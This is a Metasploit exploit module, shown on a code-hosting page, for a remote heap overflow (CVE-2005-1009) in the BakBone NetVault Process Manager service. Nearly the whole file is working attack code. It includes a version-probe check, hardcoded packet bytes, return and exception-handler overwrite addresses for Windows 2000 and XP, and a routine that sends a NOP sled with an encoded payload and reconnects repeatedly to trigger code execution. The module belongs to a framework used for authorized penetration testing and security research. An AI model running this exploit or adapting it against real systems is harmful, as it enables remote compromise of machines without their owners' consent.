Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bakbone_netvault_heap.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BakBone NetVault Remote Heap Overflow',

16
        'Description' => %q{

17
          This module exploits a heap overflow in the BakBone NetVault

18
          Process Manager service. This code is a direct port of the netvault.c

19
          code written by nolimit and BuzzDee.

20
        },

21
        'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],

22
        'References' => [

23
          ['CVE', '2005-1009'],

24
          ['OSVDB', '15234'],

25
          ['BID', '12967'],

26
        ],

27
        'Payload' => {

28
          'Space' => 1024,

29
          'BadChars' => "\x00\x20",

30
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

31
        },

32
        'Platform' => 'win',

33
        'Targets' => [

34
          ['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],

35
          ['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],

36
        ],

37


38
        'Privileged' => false,

39
        'DisclosureDate' => '2005-04-01',

40
        'Notes' => {

41
          'Reliability' => UNKNOWN_RELIABILITY,

42
          'Stability' => UNKNOWN_STABILITY,

43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

44
        }

45
      )

46
    )

47


48
    register_options(

49
      [

50
        Opt::RPORT(20031)

51
      ]

52
    )

53
  end

54


55
  def check

56
    connect

57


58
    hname = "METASPLOIT"

59
    probe =

60
      "\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +

61
      "\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +

62
      "\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +

63
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +

64
      "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +

65
      [ hname.length + 1 ].pack('V') + hname + "\x00"

66
    probe += "\x00" * (201 - probe.length)

67


68
    sock.put(probe)

69
    res = sock.get_once(1, 10)

70


71
    off = (res || '').index("NVBuild")

72


73
    if off

74
      off += 21

75
      ver = res[off + 4, res[off, 4].unpack('V')[0]].to_i

76


77
      if ver > 0

78
        print_status("Detected NetVault Build #{ver}")

79
        return Exploit::CheckCode::Appears

80
      end

81
    end

82


83
    return Exploit::CheckCode::Safe

84
  end

85


86
  def exploit

87
    print_status("Trying target #{target.name}...")

88


89
    head =

90
      "\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +

91
      "\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +

92
      "\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +

93
      "\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +

94
      "\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

95
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +

96
      "\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +

97
      "\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +

98
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

99
      "\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +

100
      "\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +

101
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

102
      "\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +

103
      "\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +

104
      "\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +

105
      "\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

106


107
    pattern = make_nops(39947) + "\x00\x00\x00"

108
    p = payload.encoded

109


110
    pattern[0, head.length] = head

111
    pattern[32790, 2] = "\xeb\x0a"

112
    pattern[32792, 4] = [ target.ret ].pack('V')

113
    pattern[32796, 4] = [ target['UEF'] ].pack('V')

114
    pattern[32800, p.length] = p

115


116
    sent = 0

117
    try = 0

118


119
    15.times {

120
      try += 1

121
      connect

122
      sent = sock.put(pattern)

123
      disconnect

124
      break if sent == pattern.length

125
    }

126


127
    if (try == 15)

128
      print_error("Could not write full packet to server.")

129
      return

130
    end

131


132
    print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")

133
    select(nil, nil, nil, 4)

134


135
    print_status("Attempting to trigger memory overwrite by reconnecting...")

136


137
    begin

138
      10.times { |x|

139
        connect

140
        sock.put(pattern)

141
        print_status("   Completed connection #{x}")

142
        sock.get_once(1, 1)

143
        disconnect

144
      }

145
    rescue

146
    end

147


148
    print_status("Waiting for payload to execute...")

149


150
    handler

151
    disconnect

152
  end

153


154
  def wfs_delay

155
    5

156
  end

157
end

158


159